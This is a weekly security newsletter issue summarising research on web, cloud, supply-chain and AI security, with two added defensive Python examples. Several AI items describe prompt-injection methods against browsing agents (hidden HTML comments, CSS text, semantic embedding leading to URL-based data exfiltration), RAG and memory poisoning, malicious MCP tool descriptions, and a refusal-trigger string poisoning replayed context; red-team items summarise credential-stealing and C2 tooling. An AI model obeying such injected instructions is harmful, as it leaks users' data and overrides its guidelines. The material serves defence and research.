
Release Date: 16th February 2026 | Issue: 59
The Security Pills newsletter is a hand-curated zine (delivered once per week) that highlights security-related news: 10+ hours of reading and analysis condensed into a 5-minute summary every Monday morning.
Sponsor
Would you like to become a sponsor for our newsletter? Our mission is to highlight security-related news with a focus on quality content, while helping people stay up to date with this corner of the industry. If you are interested, reach out to [email protected] with your ad idea to get started!
Application Security
Hacktron AI found an RCE worth $10k in Google's Antigravity IDE browser extension. Because externally_connectable was set to all URLs, any webpage could message the extension directly. The SaveScreenRecording action passed attacker controlled paths to the language server unsanitized, allowing arbitrary file writes via path traversal in the filename parameter and code execution by dropping an executable in the user's Startup folder.
Google added origin validation to the message handler, though the post shows that URL tricks and content script proxies can partially defeat it, with only the tab property check fully holding up.
GMSGadget is a research collection documenting JavaScript gadgets that can bypass XSS mitigations such as Content Security Policy and HTML sanitizers like DOMPurify. The collection catalogs gadgets across dozens of popular JavaScript libraries, providing metadata on browser compatibility, HTML attributes, CSP directives, and execution timing contexts.
These are patched vulnerabilities and intended JavaScript behaviors rather than active exploits.
Palo Alto Unit 42 researchers break down how QR codes are being abused beyond basic phishing across three vectors: shortener services that mask malicious destinations behind trusted domains, in-app deep links that trigger account takeovers on Signal, Telegram, WhatsApp and Line or kick off unauthorized payments, and direct APK downloads that skip app store review entirely.
The real issue is that most people scanning a QR code just expect a webpage, not something linking a device to their messaging account or firing off a crypto transaction.
Artificial Intelligence
Doyensec's Luca Carettoni details vulnerabilities found during a manual security audit of Outline, including SSRF, XSS, and an IDOR bypassing authorization checks. To compare results, three AI security platforms were run in parallel against the same codebase. One caught the IDOR, but false positives far outnumbered real findings, and their convincing descriptions made triage harder, reinforcing that AI security tools still work better alongside human expertise than in place of it.
The MCP Trust Registry scanned over 8,000 MCP servers and found that nearly 1 in 10 are compromised by critical vulnerabilities, including command injection flaws below the gateway layer and SSRF exposures that enable single-request access to internal networks. The free directory provides risk scores, vulnerability details, and remediation guidance to inform connection decisions before linking servers to agents.
Trail of Bits launched a security-reviewed Claude Code plugin marketplace to address risks posed by backdoors and malicious hooks discovered in published skills, as well as the lack of built-in quality gates in the plugin ecosystem. The repository hosts plugins that have passed Trail of Bits' code review process, including their own tools and vetted third-party collections.
Community contributions are welcome but must pass a formal security review and include proper attribution before inclusion.
promptfoo's Yash Chhabria explores how adversaries can attack web browsing AI agents by hiding malicious instructions in page content through HTML comments, CSS hidden text, or semantic embedding in legitimate prose. Of these techniques, semantic embedding proves hardest to defend against since models cannot distinguish instructions from content when both look like normal text.
This matters because different models fail differently: Claude's instruction hierarchy helps it resist comment-based injections, while GPT 4o/4.1's literal instruction following makes it more vulnerable to authoritative-sounding text. Once an injection lands, it enables two outcomes: exfiltrating sensitive data by tricking agents into encoding it in URLs, or manipulating agent behavior by overriding safety guidelines entirely.
Trail of Bits released a production ready configuration framework for Claude Code targeting security audits, development, and research. It provides standardized templates through global CLAUDE.md files that define coding standards and toolchains, alongside specialized MCP servers for vulnerability scanning, binary analysis, and search. The framework includes context management strategies and security focused skills that bundle vulnerability checklists with analysis patterns, supported by multi agent workflows for automated planning and parallel security analysis.
Anthropic researchers put Claude Opus 4.6 in a VM with standard utilities and tools like debuggers and fuzzers, no special instructions or custom harnesses, and it found over 500 high severity memory corruption vulnerabilities in open source codebases. Its approach included digging through Git commit histories to find similar unpatched bugs, spotting unsafe function patterns like strcat, and understanding algorithm specific constraints to trigger edge cases that traditional fuzzers miss. Each finding was validated and deduplicated by Claude, then manually triaged by researchers who wrote patches before reporting.
Anthropic documents a magic string that lets developers trigger Claude 4 refusal behavior during QA testing. Security researcher Austin Parker points out that the real problem is the trigger being deterministic. If an attacker injects the string into prompt context through user input, RAG documents, tool outputs, or shared chat history, Claude immediately halts and returns stop_reason "refusal". In systems that replay conversation history, that poisoned turn persists and breaks every future request until someone cleans the context. It is not a model vulnerability but an integration failure mode, so teams building on Claude should treat refusal handling and context hygiene as part of their security surface.
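The integration-side failure mode described above is easiest to see in code. The following is an added example, not Anthropic's code or anything from Austin Parker's write-up: it assumes a chat history stored as a list of role/content dicts where assistant turns carry the API's stop_reason, and it shows two hygiene rules for a system that replays history: never persist a refusal turn (roll back the input block that produced it instead, and alert), and scrub any refusal turns that already made it into stored history before replaying it. The trigger string is not reproduced; the sample history uses an obvious placeholder.

```python
"""Added example: context hygiene for replayed conversation history.
Not Anthropic's code. Message shape (role/content dicts, stop_reason on
assistant turns) is an assumption about the integration, not an API contract."""

REFUSAL = "refusal"

# Constructed sample history. The third turn stands in for a RAG document or
# tool output that carried the deterministic trigger; the string itself is a
# placeholder, not the real value.
SAMPLE_HISTORY = [
    {"role": "user", "content": "Summarise the quarterly report."},
    {"role": "assistant", "content": "The report shows revenue up 4%.", "stop_reason": "end_turn"},
    {"role": "user", "content": "Retrieved document: [REFUSAL_TRIGGER_PLACEHOLDER]"},
    {"role": "assistant", "content": "", "stop_reason": REFUSAL},
    {"role": "user", "content": "What were the Q3 numbers?"},
]


def is_refusal(turn):
    """True for an assistant turn the model ended with stop_reason 'refusal'."""
    return turn.get("role") == "assistant" and turn.get("stop_reason") == REFUSAL


def accept_response(history, response):
    """Decide what to persist after an API call.

    A refusal is never written back into stored history. Instead the most
    recent input block (every non-assistant turn since the last assistant
    turn: user text, retrieved documents, tool results) is rolled back, since
    that block is what carried the trigger. Returns (new_history, alert);
    alert=True tells the caller to log/escalate, because a refusal on ordinary
    business prompts is a signal that something was injected upstream."""
    if is_refusal(response):
        rolled_back = list(history)
        while rolled_back and rolled_back[-1].get("role") != "assistant":
            rolled_back.pop()
        return rolled_back, True
    return history + [response], False


def scrub_refusal_turns(history):
    """Repair history that was stored before accept_response existed.

    Every refusal turn is removed together with the input block that preceded
    it, so replaying the cleaned history no longer re-triggers the refusal on
    every subsequent request. Returns (clean_history, removed_turn_count)."""
    clean, removed = [], 0
    for turn in history:
        if is_refusal(turn):
            while clean and clean[-1].get("role") != "assistant":
                clean.pop()
                removed += 1
            removed += 1  # the refusal turn itself
            continue
        clean.append(turn)
    return clean, removed


def has_poisoned_turn(history):
    """Cheap pre-replay check: does stored history still contain a refusal?"""
    return any(is_refusal(turn) for turn in history)


if __name__ == "__main__":
    print("poisoned before scrub:", has_poisoned_turn(SAMPLE_HISTORY))   # True
    clean, removed = scrub_refusal_turns(SAMPLE_HISTORY)
    print("turns removed:", removed, "poisoned after:", has_poisoned_turn(clean))  # 2 False
```

The rollback deliberately drops the whole input block rather than just the refusal turn: if only the assistant turn were removed, the triggering document or tool output would still be replayed on the next call and the refusal would simply recur.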
Wiz's Rami McCarthy looks back at a year of agentic browser security after every major vendor shipped one in 2025. Researchers kept breaking them through zero-interaction exfiltration, CometJacking session hijacks, persistent memory poisoning, and task injection. AI browsers also consistently failed to spot phishing, and while vendors have thrown human-in-the-loop confirmations, architectural isolation, and secondary LLM critics at the problem, prompt injection is still unsolved.
For those experimenting now, McCarthy recommends three rules: isolate browser profiles from primary credentials, keep human confirmations on, and limit agents to low stakes tasks.
Blue Team
Slack's Dominic Marks walks through how their security team built a multi-agent AI system for investigating alerts, moving away from earlier prompt-based approaches toward a structured setup where separate agents handle coordination, deep analysis, and quality review across defined investigation phases. In one real investigation, the review agent caught a credential exposure the analyst had missed, which led the coordinator to redirect focus and escalate the finding. The underlying service architecture gives the team real-time visibility into investigations and cost controls, and the agents can surface things that static detection rules would never catch.
Slack's engineering team details Anomaly Event Response (AER), an automated detection and response system for Enterprise Grid that cuts response time from days to minutes. AER monitors billions of daily events with thresholds tuned to each organization's patterns, detecting access from Tor exit nodes, data scraping, excessive downloads, session fingerprint mismatches, and unusual API activity. When triggered, it kills all active sessions and generates audit logs linking back to the originating anomaly. The system tracks whether suspicious behavior persists after terminations while preventing legitimate users from getting stuck in a loop.
Cloud Security
Sysdig researchers documented a cloud intrusion where threat actors used LLM assistance to compromise AWS in under 10 minutes, starting with credentials from public S3 buckets. The attackers escalated privileges through Lambda code injection, moved laterally across 19 AWS principals, created backdoor admin users, abused Bedrock for LLMjacking, and launched GPU instances.
LLM-generated code with Serbian comments, hallucinated account IDs, and non-existent GitHub repository references throughout the operation confirmed AI-assisted execution.
Tenable's Liv Matan discovered two critical vulnerabilities in Google Looker, collectively dubbed "LookOut", enabling complete system compromise. The first chains path traversal, Git hook manipulation, and timing issues to achieve remote code execution. The second (CVE-2025-12743) bypasses security controls by intercepting web requests to access Looker's internal MySQL database, then uses SQL injection through LookML data tests to extract user data, system configurations, and stored secrets.
In Google Cloud environments these flaws could allow cross tenant access to other customers' data. While Google patched its managed Looker instances, organizations running customer hosted or on premises versions remain exposed until they apply the necessary updates.
Snowflake audit logs can arrive hours late, so if your export pipeline advances the watermark to CURRENT_TIMESTAMP on each run, you're permanently skipping events. The fix is using the observed MAX(timestamp) from each export window and only advancing after a successful write. The article provides a full implementation: a stored procedure that runs every five minutes via a Snowflake task, incrementally exporting 20 audit views as partitioned JSON to S3. If something fails, state doesn't change and the next run picks up where it left off.
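To make the watermark bug concrete, here is an added simulation (not the article's stored procedure, and not Snowflake code): a constructed set of audit events with an ingestion lag, a scheduled export loop, and the two watermark rules side by side. Event times and the 15-minute schedule are made-up values; the point it shows is that advancing the watermark to "now" on an empty run silently discards events that land hours later, while advancing only to the maximum event time actually exported, and only after the write succeeds, picks them up and also tolerates a failed run without duplicates or gaps.

```python
"""Added example: why watermark = CURRENT_TIMESTAMP loses late audit events.
Constructed data and a toy scheduler, not the article's Snowflake task."""
from dataclasses import dataclass


@dataclass(frozen=True)
class AuditEvent:
    event_id: int
    event_time: int   # minute the event actually occurred
    visible_at: int   # minute it became queryable in the audit view (ingestion lag)


# Constructed sample: normal traffic until minute 40, then a quiet period,
# then events from minutes 50-60 that only become visible at minute 200.
SAMPLE_EVENTS = [
    AuditEvent(1, 5, 6),
    AuditEvent(2, 10, 12),
    AuditEvent(3, 25, 26),
    AuditEvent(4, 40, 41),
    AuditEvent(5, 50, 200),
    AuditEvent(6, 55, 200),
    AuditEvent(7, 60, 200),
]

SCHEDULE = list(range(15, 226, 15))  # one export run every 15 minutes


def query_since(events, watermark, now):
    """What 'WHERE event_time > :watermark' returns when run at minute `now`."""
    return [e for e in events if e.event_time > watermark and e.visible_at <= now]


def advance_to_now(batch, watermark, now):
    """Buggy rule: watermark = CURRENT_TIMESTAMP, whether or not anything was exported."""
    return now


def advance_to_max_observed(batch, watermark, now):
    """Fixed rule: watermark = MAX(event_time) of rows actually written; unchanged if none."""
    return max((e.event_time for e in batch), default=watermark)


def run_exports(events, schedule, advance, fail_at=None):
    """Simulate the scheduled task. `fail_at` makes the write in that run fail,
    in which case neither the export nor the watermark is committed.
    Returns (exported event ids in order, final watermark)."""
    watermark = 0
    exported = []
    for now in schedule:
        batch = query_since(events, watermark, now)
        if now == fail_at:
            continue  # simulated S3 write failure: state does not change
        exported.extend(e.event_id for e in batch)   # the successful write
        watermark = advance(batch, watermark, now)   # commit state only after it
    return exported, watermark


def lost_events(advance, fail_at=None):
    """Ids that never reach the export under the given watermark rule."""
    exported, _ = run_exports(SAMPLE_EVENTS, SCHEDULE, advance, fail_at)
    return sorted({e.event_id for e in SAMPLE_EVENTS} - set(exported))


if __name__ == "__main__":
    print("CURRENT_TIMESTAMP watermark loses:", lost_events(advance_to_now))          # [5, 6, 7]
    print("MAX(observed) watermark loses:    ", lost_events(advance_to_max_observed))  # []
    print("MAX(observed) with a failed run:  ",
          run_exports(SAMPLE_EVENTS, SCHEDULE, advance_to_max_observed, fail_at=30)[0])
```

One caveat worth adding from the defender's side: MAX(observed) protects against the quiet-period case shown here, but an event that lands later than a newer event from the same view would still fall behind the watermark, so a pipeline that must not miss anything also needs a lag buffer (query up to now minus the worst observed delay) or periodic reconciliation against the source.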
Reversec's Christian Philipov digs into SharePoint Online's pre authentication URL feature, enabled by default across tenants. SharePoint generates signed download URLs with a tempauth token for every file, and these bypass IP allowlists, Conditional Access policies, and sharing restrictions entirely.
An attacker with read access can enumerate files via SharePoint's REST APIs and download them from any IP without needing session cookies. MSRC called it a guardrail rather than a security boundary and rated it low severity. Philipov recommends disabling it with Set-SPOTenantPreAuthSettings -IsDisabled $true unless there's a specific business need.
Container Security
Docker released Sandboxes, using microVM isolation to let coding agents run unsupervised in dedicated environments on macOS and Windows. Each sandbox is a full dev environment where agents can install packages and run containers, fully isolated from the host with network controls and instant resets. No more constant permission prompts or risking your system just to let an agent do its job.
Red Team
Maldev Academy released DumpBrowserSecrets, a tool for extracting credentials, cookies, credit cards, tokens, and browsing history from Chrome, Edge, Firefox, Opera, and Vivaldi. It uses an executable to parse browser databases and a specialized DLL to retrieve encryption keys through process injection techniques. The tool handles different encryption schemes across browser families and offers flexible options for targeted or bulk extraction.
SpecterOps' Andrew Gomez and Allen DeMoura released azureBlob, a Mythic C2 profile that routes agent communication through Azure Blob Storage, taking advantage of the broad *.blob.core.windows.net firewall exceptions that vendors like Citrix, Parallels, and Nerdio recommend in their deployment guides. Each agent gets a container-scoped SAS token at payload generation, so if one gets burned the damage stays contained, and the storage account key never leaves the Mythic server. Agents communicate through simple blob PUT/GET/DELETE operations, and the server discovers new agents automatically by enumerating containers.
Supply Chain
A Claude Code configuration system enforces structured development practices through hooks operating at multiple lifecycle points, replacing unsafe defaults like direct main commits and test skipping with controlled workflows. Three specialized agents (Planner, Implementer, and Guardian) coordinate approval cycles while hooks block destructive operations, rewrite unsafe commands, require test evidence before commits, and enforce plan-driven development independent of model behavior or context window pressure.
Eugene Lin built a GitHub Action that uses Claude to detect security vulnerabilities in open source repositories by analyzing commit diffs and PR context, only alerting when concrete exploits can be demonstrated. The tool automatically creates vulnerability issues, prevents duplicate analysis, and supports configurable repository monitoring and alert destinations.
Reversec's Thomas Byrne walks through how attackers with write access to Azure DevOps pipelines can extract credentials across multiple vectors, from mapping KeyVault secrets to environment variables for exfiltration, to enumerating secret names via CLI, to pulling GitHub Service Connection tokens from .git/config files. Once extracted, these credentials authenticate to other repositories and downstream services, enabling lateral movement across the org and potentially into on-prem environments through more privileged Service Principals.
Threat Hunting
Datadog researchers identified a campaign using fake GitHub repositories to deliver macOS infostealers through ClickFix social engineering. The attack redirects users through GitHub Pages staging sites that mimic GitHub interfaces before tricking victims into executing malicious commands in Terminal.
The malware collects enterprise artifacts like business documents and RDP configurations, profiles how wallet extensions store secrets, and caps folder collection at 100MB to avoid detection. Later versions maintain persistence through a fake GoogleUpdate binary that checks in with C2 every 60 seconds, giving operators ongoing remote access rather than just a one-time data grab.
Christian Schneider breaks down why STRIDE doesn't cut it for agentic AI: it evaluates components individually while real attacks chain across them. His five-zone model traces how malicious input moves through input surfaces, planning, tool execution, memory, and inter-agent communication. He walks through three scenarios to prove the point: RAG poisoning that hijacks reasoning, MCP tool descriptions that exfiltrate credentials, and multi-agent cascades where poisoned context passes through trusted peers into unauthorized actions. Each path gets formalized into attack trees mapped to OWASP, MAESTRO, and ATFAA. From there, map trust boundaries, run scenario workshops before picking controls, and ensure two independent controls per high-risk node.
Wrapping Up
If you enjoyed this newsletter and think others would too, it would mean a lot to us if you'd forward this email to other people who may enjoy it as well. You can also reply to this email; I'd love to get in touch with you.
Thanks,
Sebas
